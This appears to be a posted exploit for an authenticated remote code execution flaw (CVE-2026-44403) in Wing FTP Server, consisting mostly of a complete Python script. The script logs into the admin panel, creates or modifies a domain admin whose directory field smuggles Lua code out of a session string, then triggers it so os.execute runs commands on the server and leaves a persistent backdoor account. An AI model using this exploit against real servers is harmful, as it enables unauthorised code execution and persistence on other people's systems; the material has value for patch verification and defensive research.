Wing FTP Server 8.1.3 - Authenticated Remote Code Execution

Indicators of Compromise

• exploit-code: # Exploit Title: Wing FTP Server 8.1.3 - Authenticated Remote Code Execution # Date: 12.05.2026 # Exploit Author: Ünsal Furkan Harani # Vendor Homepage: [https://www.wftpserver.com/](https://www.wftpserver.com/download.htm) # Software Link: https://www.wftpserver.com/download.htm # Version: v8.1.2 # Tested on: Wing FTP Server <= 8.1.2, fixed in 8.1.3 # CVE : CVE-2026-44403 Wing FTP Server v8.1.2 contains a Remote Code Execution (RCE) vulnerability in the session serialization mechanism. An authenticated administrator can inject arbitrary Lua code through the domain admin `mydirectory` (basefolder) field, which gets executed server-side via `loadfile()`. #!/usr/bin/env python3 """ PREREQUISITES: - Valid full admin credentials (not readonly, not domain admin) - Target: Wing FTP Server web admin panel (default port 5466) IMPACT: Remote Code Execution as the Wing FTP Server service account. Persistence: payload re-executes every time the poisoned session is loaded. """ import requests import hashlib import json import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class WingFTPSessionPoisoning: def __init__(self, target, admin_user, admin_pass, use_ssl=False): proto = "https" if use_ssl else "http" self.base_url = f"{proto}://{target}" self.admin_user = admin_user self.admin_pass = admin_pass self.session = requests.Session() self.session.verify = False def login(self): """Authenticate to the admin panel and obtain UIDADMIN session cookie.""" # service_login.html accepts credentials via POST url = f"{self.base_url}/service_login.html" data = { "username": self.admin_user, "password": self.admin_pass, } headers = { "Referer": f"{self.base_url}/admin_login.html", } resp = self.session.post(url, data=data, headers=headers) try: result = resp.json() if result.get("code") == 0: print(f"[+] Login successful as '{self.admin_user}'") return True elif result.get("code") in (1, 2): print(f"[-] 2FA required — this PoC doesn't handle TOTP") return False else: print(f"[-] Login failed: {result}") return False except Exception: # Legacy endpoint (admin_loginok.html) returns HTML if "logged in ok" in resp.text or "main.html" in resp.text: print(f"[+] Login successful (legacy endpoint)") return True print(f"[-] Login failed: {resp.text[:200]}") return False def create_poisoned_admin(self, poison_admin_user, poison_admin_pass, lua_payload): """ Create a domain admin with a poisoned 'mydirectory' (basefolder) field. The mydirectory value will be serialized as: _SESSION['admin_basefolder']=[[<mydirectory_value>]] Our payload breaks out of the [[ ]] long string: _SESSION['admin_basefolder']=[[/tmp/x]]<LUA_PAYLOAD>--]] When this session file is loaded via loadfile() + f(), the payload executes. """ # Construct the poisoned basefolder value # Format: <innocent_prefix>]]<lua_code>-- # The ]] closes the long string, code executes, -- comments out the rest poisoned_basefolder = f"/tmp/x]]{lua_payload}--" admin_obj = { "username": poison_admin_user, "password": poison_admin_pass, "readonly": False, "domainadmin": 1, # Make it a domain admin "domainlist": "", # Will be set by server "mydirectory": poisoned_basefolder, # THIS IS THE PAYLOAD "ipmasks": [], "enable_two_factor": False, "two_factor_code": "", } url = f"{self.base_url}/service_add_admin.html" headers = { "Referer": f"{self.base_url}/main.html", } admin_json = json.dumps(admin_obj, separators=(',', ':')) print(f"[*] Creating poisoned domain admin '{poison_admin_user}'...") print(f"[*] Poisoned basefolder: {poisoned_basefolder}") # Use multipart/form-data — Wing FTP's Lua POST parser handles it more reliably resp = self.session.post(url, files={"admin": (None, admin_json)}, headers=headers) try: result = resp.json() if result.get("code") == 0: print(f"[+] Poisoned admin created successfully!") return True elif result.get("code") == -3: print(f"[!] Admin '{poison_admin_user}' already exists. Trying modify...") return self.modify_poisoned_admin(poison_admin_user, poison_admin_pass, lua_payload) else: print(f"[-] Failed to create admin: {result}") return False except Exception: print(f"[-] Unexpected response: {resp.text[:200]}") return False def modify_poisoned_admin(self, poison_admin_user, poison_admin_pass, lua_payload): """Modify existing admin to inject the poisoned basefolder.""" poisoned_basefolder = f"/tmp/x]]{lua_payload}--" admin_obj = { "username": poison_admin_user, "password": poison_admin_pass, "readonly": False, "domainadmin": 1, "domainlist": "", "mydirectory": poisoned_basefolder, "ipmasks": [], "enable_two_factor": False, "two_factor_code": "", } # service_modify_admin.html has NO bracket stripping at all url = f"{self.base_url}/service_modify_admin.html" headers = { "Referer": f"{self.base_url}/main.html", } admin_json = json.dumps(admin_obj, separators=(',', ':')) resp = self.session.post(url, files={"admin": (None, admin_json), "oldname": (None, poison_admin_user)}, headers=headers) try: result = resp.json() if result.get("code") == 0: print(f"[+] Admin '{poison_admin_user}' modified with poisoned basefolder!") return True else: print(f"[-] Failed to modify admin: {result}") return False except Exception: print(f"[-] Unexpected response: {resp.text[:200]}") return False def trigger_payload(self, poison_admin_user, poison_admin_pass): """ Trigger the payload by logging in as the poisoned domain admin. On login, service_login.html:95-96 stores the basefolder in session: rawset(_SESSION,"admin_basefolder",basefolder) rawset(_SESSION,"admin_nowpath",basefolder) SessionModule.save() serializes it as: _SESSION['admin_basefolder']=[[/tmp/x]]<PAYLOAD>--]] The payload executes on the NEXT session load (any subsequent request). """ print(f"\n[*] Triggering payload by logging in as '{poison_admin_user}'...") trigger_session = requests.Session() trigger_session.verify = False url = f"{self.base_url}/service_login.html" data = { "username": poison_admin_user, "password": poison_admin_pass, } headers = { "Referer": f"{self.base_url}/admin_login.html", } # Step 1: Login — stores poisoned basefolder in session resp = trigger_session.post(url, data=data, headers=headers) print(f"[*] Login response: {resp.text[:200]}") # Step 2: Any subsequent request triggers loadfile() on the session file # The session file now contains the Lua payload trigger_url = f"{self.base_url}/service_get_dir_list.html" headers["Referer"] = f"{self.base_url}/main.html" resp2 = trigger_session.post(trigger_url, data={"dir": ""}, headers=headers) print(f"[*] Trigger response: {resp2.status_code}") print(f"[+] Payload should have executed on the server!") return True def demo_session_file(): """ Demonstrate what the poisoned session file looks like. Shows the exact Lua code that gets written and executed. """ print("=" * 70) print("DEMONSTRATION: Poisoned Session File Content") print("=" * 70) payload = 'os.execute("id > /tmp/wingftp_pwned.txt")' basefolder = f'/tmp/x]]{payload}--' print(f"\n[1] Admin sets mydirectory to:") print(f" {basefolder}") print(f"\n[2] On login, session is saved. serialize() outputs:") session_content = f"""_SESSION['admin']=[[poisoned_admin]] _SESSION['admin_basefolder']=[[{basefolder}]] _SESSION['admin_domainadmin']=1 _SESSION['admin_domainlist']=[[]] _SESSION['admin_nowpath']=[[{basefolder}]] _SESSION['admin_readonly']=0 _SESSION['ipaddress']=[[127.0.0.1]] _SESSION['logined']=[[true]]""" print(f" --- session file content ---") for line in session_content.split('\n'): print(f" {line}") print(f" --- end ---") print(f"\n[3] Lua parser sees the basefolder line as:") print(f" _SESSION['admin_basefolder']=[[/tmp/x]] --> string '/tmp/x'") print(f" {payload} --> EXECUTED AS CODE!") print(f" --]] --> comment (ignored)") print(f"\n[4] Same for admin_nowpath line — payload executes TWICE.") print(f"\n[5] Result: '{payload}' runs as server process.") print("=" * 70) def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <mode> [args...]") print(f"") print(f"Modes:") print(f" demo — Show how the vulnerability works") print(f" exploit <host:port> <user> <pass> — Create poisoned admin and trigger RCE") print(f"") print(f"Examples:") print(f" {sys.argv[0]} demo") print(f" {sys.argv[0]} exploit 192.168.1.10:5466 admin password123") sys.exit(1) mode = sys.argv[1] if mode == "demo": demo_session_file() elif mode == "exploit": if len(sys.argv) < 5: print("Usage: exploit <host:port> <admin_user> <admin_pass>") sys.exit(1) target = sys.argv[2] admin_user = sys.argv[3] admin_pass = sys.argv[4] # Default payload — write proof file (Windows-compatible) lua_payload = 'os.execute("whoami > C:\\\\wingftp_pwned.txt")' poison_admin = "svc_backup" poison_pass = "P@ssw0rd123!" print(f"[*] Wing FTP Server Session Poisoning RCE — Chain 2") print(f"[*] Target: {target}") print(f"[*] Payload: {lua_payload}") print(f"[*] Poisoned admin account: {poison_admin}") print() exploit = WingFTPSessionPoisoning(target, admin_user, admin_pass) if not exploit.login(): sys.exit(1) if not exploit.create_poisoned_admin(poison_admin, poison_pass, lua_payload): sys.exit(1) exploit.trigger_payload(poison_admin, poison_pass) print(f"\n[*] Check /tmp/wingftp_pwned.txt on target for proof of execution") else: print(f"Unknown mode: {mode}") sys.exit(1) if __name__ == "__main__": main() Sent with [Proton Mail](https://proton.me/mail/home) secure email.